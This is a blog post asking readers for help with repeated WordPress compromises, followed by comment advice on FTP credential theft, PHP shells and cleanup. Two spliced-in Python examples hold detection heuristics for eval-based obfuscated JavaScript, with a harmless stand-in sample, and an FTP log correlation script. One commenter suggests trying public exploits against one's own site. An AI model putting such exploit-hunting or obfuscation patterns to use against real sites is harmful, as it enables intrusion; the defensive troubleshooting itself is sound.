Help needed – War to hackers
You know this blog has been attacked several times by hackers (or crackers, call them whatever you want, I can’t tell you how I would call them).

I tried everything, such as 10 ways to secure your WordPress blog and changing the hosting.
Attacks continue, with injection of malicious code in javascript files.
I had my hosting service, HostGator, monitoring the activity on the blog and they said “We found a few PHP shells on your account and removed this. This indicates that you have insecure scripts on your account. Please review each script and ensure that you are running the latest versions”.
Obviously I am running the latest versions of everything, so I really do not know how to prevent the site from being hacked almost every day.
That’s why I need you… I am not a security expert but maybe some of you are.
I need some hints and tips about finding this insecure script and removing it once for all.
I will update this post with all information you need.
If you are a security pro, I can pay for your service or can give you a lifetime ad somewhere in the blog (but I’d prefer to pay :))
UPDATE #1
The blog has been attacked again. Look how they modified the jquery.js file

And this is the injected code
This post has 42 comments
Chris
Hey. If you’re running 3rd Party Application they might have malicious code or code that isn’t fully validating the user input.
If you have uploads or whatever else on your blog, it might be the same.
Also be sure to have the latest WP Version, since there are many sites spreading security holes and they are having crawlers searching for those sites with these versions.
Just never trust the user.
I’ve been wondering why Mozilla was saying that the site was malicious anyway.
If you could give more information, it would be useful.
Hope I could help a bit.
Greetz,
Chris
niraj
big fan of your blog
Do you use Windows OS and FileZilla as FTP client? I had the same problem (iframe and script injection) due to FileZilla.
Emanuele Feronato
@chris: I have some plugins, I can list them all if you need
@niraj: yes, I have filezilla and various windows OS (XP, vista and 7) on the computers I use to manage the blog.
Nick
One of the plugins can have a leak.
Emanuele Feronato
OK I’ll list my plugins. Meanwhile I got another attack
Chris
I’ll look into it when I’m back at home. Sitting in the train now ;)
But looks really like some malicious assembler code that they try to run.
I’ll take a look at it. Also you could send me a mail with your plugins and wp version so I can check out which of those may be the problem (and check the dark site of the web for exploits).
Greetz
Chris
Btw..In the meantime, try loading jQuery from the google servers so you don’t have to have it locally.
Maybe that will at least stop this exploit till I or someone finds the problem
Chris
Okay it seems it’s the
HTML/Crypted.Gen
I also could find many threads concerning the same problem.
Most of them tend to change ftp password and for wordpress this link:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
Maybe someone find out your password due to using the same password as for the ftp on some untrusted sites..
Since I really can’t imagine how they could change files on the ftp rather than having the password or having a bad hoster.
niraj
dear Emanuele
some bad guys/programs were able to get in and get the password stored in filezilla (Every ftp info we type in filezilla gets stored somewhere it later shows the list when we click on the arrow button)
I was able to get rid of the attack by
1) manually removed all the injected scripts
2) change the ftp password
3) never used FileZilla again as FTP client; I switched to CuteFTP
And one thing I noticed was the hackers used to inject files in a regular time frame, like once in 2 hours, 5 hours or once a day.
mel
Hi. I’m not a security expert, but this sounds just like the kind of problem we had at work half a year ago.
This was the problem:
1. we received a mail from our ISP telling that they found some malicious stuff on our server.
2. we checked, and it was true, some files had some weird code added into them, very similar to the stuff I see in jquery.js
3. deleting these lines didn’t help, since they appeared back again and also in different files.
I had to look into this. This is what I found:
To get right to the point, the reason the server was infested was because none of the PCs at work had virus protection lol. The problem was, that one computer, that had access to server (had username/password stored) was infested with a trojan horse. So what did this trojan do? It connected to the servers it had the passwords for and started infesting files it found on the server, mainly php files in this case..
So basically all the servers that I had stored usernames/passwords for in FireFTP or CuteFTP were infected, as I later found out. Ouch!
niraj mentioned iFrame, we had something to do with that as I remember, the trojan adding weird lines between iFrame tags if I remember right.
How to get rid of this:
1. scan all the computers that have access to server or change the server user/pass and scan your computer
2. i suggest doing an online scan! TrendMicro free online scan: http://us.trendmicro.com/us/housecall/
3. when you are clean, I would change the server user/pass again
4. now the server – what I did was remove the virus by hand (deleted the lines in the files in notepad), but I suggest you follow the tutorial Chris posted. the point is to get rid of all the trojan added lines in your server files – either do it by hand or with a virus protection
my employer went and bought protection for all computers after that, that was a good lesson for him :)
always use virus protection on your computer! Remember that supposedly around 80% of anti-virus programs that are cracked and downloaded from the web, have trojan viruses already in them!
hope this helps, you have helped me a lot :)
Chris
As mentioned before the attacker must have had direct control over the ftp or control over some plugins that had upload privileges.
Or he just had a way to upload a prepared PHP file which he can use as FTP client.
Therefore he can do all the things you could do -> execute shell cmds, upload/download stuff, get the password of the database and maybe as well for the FTP.
Some options:
- Try to detect and delete ALL backdoors he has opened. That’s kinda hard, since you can’t be sure
- Fresh-Install with the newest version use working backup (though you might not have backups or you can’t be sure they are clean).
Also as niraj mentioned: AntiVir-Tools! Surfing without it is just insane.
But I’m sure you are using some kind of, so I don’t want to tell you not to use *.exe from people and sites you don’t really know ;)
Hopefully you can get rid of those scriptkiddies..
Ramon Fritsch
Hey man, there is a little trick to make sure that files won’t be modified. Just disable the write permissions. Try to remove all write permissions from .js or .css files.
Emanuele Feronato
thank you to everybody.
I have McAfee Security Center installed, obviously an original registered version.
Now I am scanning the PC with HouseCall, I’ll update you when done.
VideoGuy
Have you ever considered switching to a CMS besides WordPress? Or even making your own? For the low amount of features in WordPress that you actually use, I think it may be worth making your own system for posts. That way the exploits wouldn’t be very well known.
Concerned User
I can help. Email me please.
Chris
I wouldn’t recommend that, since that would take much time and most self-made stuff isn’t secure enough (because people forget to validate and sanitize data…).
@Ramon: That won’t protect it from being exchanged or modified if the cracker has the FTP password.
George
I don’t understand why bad people attack your website. Anyway I hope you solve the security problems.
This is the best blog ever.
Regards,
George
Niall
McAfee is your first mistake, haha. Slow, bloated, overall not very good in my opinion, Avira Antivir all the way.
Change your jQuery src to Google API’s one – http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js – preventing more injection and commonly used so it’s likely it’ll decrease load time as it’s already in the user’s cache.
Guest
i think your problem is WordPress… since it’s open source, it has a lot of exploits, some are fixed others are not even known yet, and the hackers find new exploits every day…
AnotherGuest
Maybe screaming “My website is being attacked because it has security issues that I can’t figure out” is not the best way to avoid being attacked even more?
Just a thought…
Darryl
It looks like it could be a plugin, or even the host isn’t performing right in the security. Why don’t you change the file CHMOD, to make it inaccessible? Maybe that could stop the idiots hacking you.
Andrew J
I’m no expert, but I’d guess that listing a load of information about the blog could make it even easier to hack.
KrazyBig
Is this a SQL injection attack or file modification? If it is the latter, you should be able to chmod the permissions on the WordPress directories to prevent the modification of files. I used to have a few problems with hacks on some of my sites but since making that change, I haven’t had any issues.
brainstormingin
Hi,
Sorry to hear that your blog is being hacked. I am no security expert but similar problem happened to me on one of my game sites made in wordpress. I downloaded my whole site to my local drive. Then I scanned every file like php and css and js and removed the encoded functions stored by the hackers. Online I deleted all the files in my web directory. I installed a fresh copy of the latest wordpress with latest versions of the plugins I use. Then from online file manager I uploaded required files like themes and uploads folders. I had to reconfigure some settings. :( . There is a security hole in the commenting system in wordpress I guess. So I had to disable user comments. I think you should change your ftp software. Never store any password in any program on your computer. These programs might have security leaks which can be exploited. I use Kaspersky internet security and its good.
I have learnt a lot from your blog and tutorials.
Wish you all the best.
Andrea
Upgrade to the latest version of wordpress
Change FTP login and password
Check if the plugins have bugs
The gates of the site to scan for open ports from backdoor
gamesloop
Hi Emanuele
I decoded that string. It’s a bunch of Java and PHP code, but I don’t know any of these languages. I used Flash to decode it.
My advice is to disable the Eval() function. It’s used a lot of times, over and over again until the whole code is recreated to its original state, after which it is executed.
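brainstormingin downloaded the whole site and scanned every .php/.css/.js file by hand for the encoded functions, and gamesloop notes the injected string rebuilds itself through repeated eval() calls. The following is an added example, not code from the post or any commenter, of a small offline triage scanner for such a site copy: it flags files that combine eval()/unescape()/document.write() with one very long string literal made of escape-like noise. The thresholds (400 characters, 20 escapes, two indicators) and the sample file contents are assumptions constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# Heuristics drawn from what the thread describes: self-decoding JavaScript
# that ends in eval(...), helper calls like unescape()/document.write(), and
# a single very long string literal of hex-escape-like noise (the "%41"
# form or the "Z41" substitution variant). Thresholds are assumptions.
SUSPICIOUS_CALLS = re.compile(r"\b(eval|unescape|document\.write)\s*\(")
LONG_STRING = re.compile(r"""(["'])(?:(?!\1).){400,}\1""")
ESCAPE_NOISE = re.compile(r"[Z%][0-9a-fA-F]{2}")
MIN_LITERAL, MIN_ESCAPES = 400, 20


def score_text(text: str) -> dict:
    """Compute the indicators for one file; flagged when at least two fire."""
    calls = sorted({m.group(1) for m in SUSPICIOUS_CALLS.finditer(text)})
    longest = max((len(m.group(0)) for m in LONG_STRING.finditer(text)), default=0)
    escapes = len(ESCAPE_NOISE.findall(text))
    indicators = {
        "eval_present": "eval" in calls,
        "decoder_calls": bool(set(calls) & {"unescape", "document.write"}),
        "long_literal": longest >= MIN_LITERAL,
        "escape_noise": escapes >= MIN_ESCAPES,
    }
    return {"calls": calls, "longest_literal": longest, "escapes": escapes,
            "indicators": indicators, "flagged": sum(indicators.values()) >= 2}


def scan_tree(root, suffixes=(".js", ".php", ".css")) -> list:
    """Walk a downloaded site copy and return (path, score) for flagged files."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            score = score_text(path.read_text(errors="replace"))
            if score["flagged"]:
                hits.append((str(path), score))
    return hits


# Constructed samples: a clean theme snippet, and a harmless stand-in with the
# same shape as a self-decoding blob (the literal decodes to "document" x 40).
CLEAN_JS = "jQuery(function($){ $('.tab').click(function(){ $(this).toggle(); }); });"
BLOB = ('$a="' + "Z64Z6fZ63Z75Z6dZ65Z6eZ74" * 40 + '";'
        'function z(s){return unescape(s.replace(/Z/g,"%"));}eval(z($a));')


def demo() -> list:
    """Write both samples into a temporary 'site copy' and scan it."""
    root = Path(tempfile.mkdtemp())
    (root / "easytabs.js").write_text(CLEAN_JS)
    (root / "jquery.js").write_text(BLOB)
    return scan_tree(root)


if __name__ == "__main__":
    for path, score in demo():
        print(path, score["calls"], score["longest_literal"], score["escapes"])
```

A flagged file still needs a human look (minified libraries can carry long literals), but the combination of an eval sink and escape noise narrows hundreds of files down to a handful.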
Astro75
Now you have trojans.
2009.12.11 15:53:02 http://www.emanueleferonato.com/wp-content/themes/silhouette-3column/easytabs.js Firefox Denied: Trojan-Downloader.JS.Twetti.a
Emanuele Feronato
some quick info:
1) CHMODding the files did not stop attacks
2) Sometimes the FTP time does not even change
3) My computer is clean, but I have to admit I used a password that’s not unique in all accounts I registered around the web… I am going to change it with a new, unique one, and we’ll see what happens.
Chris
CHMOD will only change the permission of the files…But if the hacker has the FTP Login, it’s useless.
If he is using other plugins that need 777 CHMOD, Emanuele can’t change it or the plugin won’t work.
Also people read what others have suggested already…I think everything has been said now at least twice.
Emanuele, didn’t you want to list up the plugins you’re using and WP Version? You can also try to hack yourself: Search the exploits (i.e. milw0rm.com) that fit your version and try them. If you have success, you know you have either to upgrade or fix it on your own. (mostly these are blind SQL injections in some parts when wp or a plugin isn’t escaping the userinput).
I hope you can get rid of those attacks soon.
Emanuele Feronato
My plugins are:
Akismet Version 2.2.6
MobilePress Version 1.1.3
Multi Column Category Version 1.0
WordPress Exploit Scanner version 0.7
WordPress Firewall version 1.25
WP-PostRatings version 1.50
WP-Syntax Syntax version 0.9.8(without “test” directory that can be exploited)
WP Extra Template Tags version 0.4
WP Page Numbers version 0.5
WP Security Scan version 2.7.1.2
Avi
I posted my earlier comments in the wrong post. Apologies. However our offer still stands. Do let us know if you need our help.
PA
Recently my site was also affected with similar stuff. I was using FileZilla FTP, Windows OS.
IMPORTANT -> Stop using FileZilla or any other FTP to access your websites for some time.
1) Contact your hosting support, provide them with the exact code & ask them to search for the code in all your files, especially .js files in the plugin folder.
2) Change all your passwords – FTP, Mail, Logins – everything
3) Ask the support for FTP access logs (they have access, if you are on shared hosting) & look for previous login attempts from IPs other than yours.
4) If you find a login is made from that specific IP in your FTP log, even after changing password, change it once again!!
In such cases, your hosting support must co-operate with you in eliminating all this.
Andrea
I checked your server, there are too many open ports, including a port running an unknown service.
Mike Duguid
I’ve seen a similar issue where a PC was infected with a gumblar variant (up to date AV didn’t recognise!) which sniffed ftp details. The outgoing data also bypassed a firewall by attaching to an svchost instance. So don’t be too sure a quick scan will give you an ‘all clear’ for this route of vulnerability. The way to -know- and not -guess- how the attack is happening is to check server logs against modification time of infected files and correlate users/ips/access at that time. Once you -know- how the attack happened you can sort it rather than stumbling from one ineffective solution to another. I’ll reiterate again – don’t use shared hosting (shared hosting is a complete waste of time for professional use – can’t modify firewall rules e.g lock ftp to your own, often can’t get access to ftp logs, change apache/ftp users permission, no sftp or ssh etc etc).
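PA’s step 3 (look in the FTP logs for logins from addresses other than yours) and Mike’s advice above (check the logs against the modification time of the infected files) are the same investigation. The following is an added example, not code from the post or any commenter, that does that correlation over a small FTP log. The one-line-per-transfer log format, the timestamps, the TEST-NET addresses, the username and the five-minute window are all constructed assumptions; a real server logs in its own format, so the parser would need adjusting.

```python
from datetime import datetime, timedelta
from ipaddress import ip_address

# Constructed FTP access log in a simplified format assumed for this example:
#   "<date> <time> <user> <client-ip> <command> <path>"
FTP_LOG = """\
2009-12-11 09:12:40 owner 198.51.100.7 STOR /public_html/wp-content/uploads/pic.png
2009-12-11 15:51:09 owner 203.0.113.77 RETR /public_html/wp-includes/js/jquery.js
2009-12-11 15:51:12 owner 203.0.113.77 STOR /public_html/wp-includes/js/jquery.js
2009-12-11 15:51:15 owner 203.0.113.77 STOR /public_html/wp-content/themes/silhouette-3column/easytabs.js
2009-12-11 18:02:33 owner 198.51.100.7 RETR /public_html/wp-config.php
"""

# Modification times of the tampered files (constructed, as if read with
# os.stat() on the downloaded copy or from an "ls -l --time-style=full-iso").
INFECTED = {
    "/public_html/wp-includes/js/jquery.js": datetime(2009, 12, 11, 15, 51, 12),
    "/public_html/wp-content/themes/silhouette-3column/easytabs.js":
        datetime(2009, 12, 11, 15, 51, 15),
}

KNOWN_GOOD_IPS = {ip_address("198.51.100.7")}   # the owner's own address (assumed)
WRITE_COMMANDS = {"STOR", "APPE", "DELE", "RNTO"}  # commands that change files
WINDOW = timedelta(minutes=5)


def parse_log(text: str) -> list:
    """Turn the log text into dicts with a real datetime and ip_address."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, time, user, ip, cmd, path = line.split(maxsplit=5)
        entries.append({"ts": datetime.fromisoformat(f"{date} {time}"),
                        "user": user, "ip": ip_address(ip), "cmd": cmd, "path": path})
    return entries


def correlate(entries, infected, known_good, window=WINDOW) -> list:
    """For each tampered file, return the write operations logged within
    `window` of its mtime, marking those from addresses that are not yours."""
    findings = []
    for path, mtime in infected.items():
        for e in entries:
            if (e["path"] == path and e["cmd"] in WRITE_COMMANDS
                    and abs(e["ts"] - mtime) <= window):
                findings.append({"path": path, "ts": e["ts"], "ip": str(e["ip"]),
                                 "user": e["user"],
                                 "foreign": e["ip"] not in known_good})
    return findings


def foreign_ips(entries, known_good) -> list:
    """Every address seen in the log that is not on the known-good list."""
    return sorted({str(e["ip"]) for e in entries if e["ip"] not in known_good})


if __name__ == "__main__":
    log = parse_log(FTP_LOG)
    for f in correlate(log, INFECTED, KNOWN_GOOD_IPS):
        print(f["ts"], f["ip"], "FOREIGN" if f["foreign"] else "known", f["path"])
    print("addresses not yours:", foreign_ips(log, KNOWN_GOOD_IPS))
```

If the writes line up with a foreign address using the owner’s own credentials, the password was stolen (the FileZilla/trojan route several commenters describe); if no FTP write matches the mtime at all, the change came another way and the HTTP access log is the next place to look, as Mike says.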
Mike Duguid
Andrea, he’s running on a hostgator host – he cannot make changes to the overall server config that would make any difference, and it’d be unlikely that a shared server with 1000′s of people on it has been rooted. I’d take the hostgator advice with a pinch of salt, it’s a standard canned reply, the tier of support staff you will deal with at large companies like this haven’t the knowledge or time to really get to the bottom of the cause.
sandro
try this
http://www.evilsocket.net/764/wp-sentinel-pubblicato.html
Emanuele Feronato
I changed the FTP password and never used the FTP since then, but attacks continue.
I think there is an unsanitized PHP file executing scripts… but I can’t find it…
Vadersapien
If you never get to find it, I think the best thing to do would be delete everything on the server(maybe keep MySQL tables), and restore from a backup…although that PHP file might have existed when you hosted the site on the other server, explaining why the attacks carried over between servers…
Mike Duguid
If you’re sure it’s not via FTP, scanning your http access logs and correlating those with file modification times is the next step.
Badim
Oh man, I got the same attack a few weeks ago.
What you HAVE to add – as Vadersapien said:
Purge your http directory, upload the latest installation of WP and connect it to your MySQL tables. Or restore a backup from BEFORE (you have to be 100% sure) your http was modified.
How these attacks work:
You lost your password to TrojanX, TrojanX sent all FTP info to special ServerY, and left a PHP file in case you change the pass. Server Y, each day, each time, tries to do the same script for each access it has; if the access is not working, it will try the PHP file; if not, the attacks will probably stop.
This whole process is automatic, so it is not personal stuff, just some hackers doing what they can to get extra $ =(
Jafar
Try using N-Stalker to search for threats. It’ s really a good program :)
Emanuele Feronato - italian geek and PROgrammer
[...] you should know if you are an old time reader, this blog has been hacked several times with malicious script [...]